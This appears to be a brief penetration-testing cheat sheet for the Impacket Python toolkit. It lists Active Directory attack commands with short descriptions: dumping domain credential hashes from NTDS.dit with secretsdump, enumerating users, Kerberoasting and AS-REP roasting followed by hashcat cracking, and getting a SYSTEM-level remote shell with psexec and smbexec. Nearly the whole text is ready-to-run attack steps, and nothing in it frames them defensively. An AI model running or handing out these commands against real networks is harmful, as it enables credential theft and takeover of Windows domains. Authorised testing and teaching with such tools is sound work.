Impacket is a collection of Python classes for working with network protocols.
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
This script will gather data about the domain’s users and their corresponding email addresses.
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
GetUserSPNs.py -request <domain>/<user>:<pw> // -dc-ip <ip>
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
GetNPUsers.py <domain>/<user> -no-pass
-> Crack hash e.g. using hashcat
PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
sudo smbexec.py <user>:<pw>@<target>